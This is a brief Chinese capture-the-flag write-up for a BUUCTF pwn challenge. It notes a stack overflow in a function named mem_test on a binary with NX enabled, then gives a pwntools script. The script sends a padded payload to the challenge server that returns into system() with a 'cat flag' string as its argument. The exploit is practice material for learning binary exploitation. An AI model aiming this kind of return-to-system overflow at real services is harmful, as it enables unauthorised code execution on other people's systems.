日常buu

国际惯例

 

 

Ida

 

 

没啥问题，去看看mem_test函数有没有问题。

 

 

NX还有栈溢出难道是ROP？还是gdb看看hint是啥吧。

 

 

哦豁！

 

 哦豁！

 

 

 

 

那这样思路有了栈溢出system执行catflag。

from pwn import*

r=remote("node3.buuoj.cn",27175)

system_addr = 0x08048440

catflag_addr = 0x080487E0

payload='A'*0x17 + p32(system_addr) + p32(0x080487E0) + p32(0x080487E0)

r.sendline(payload)

r.interactive()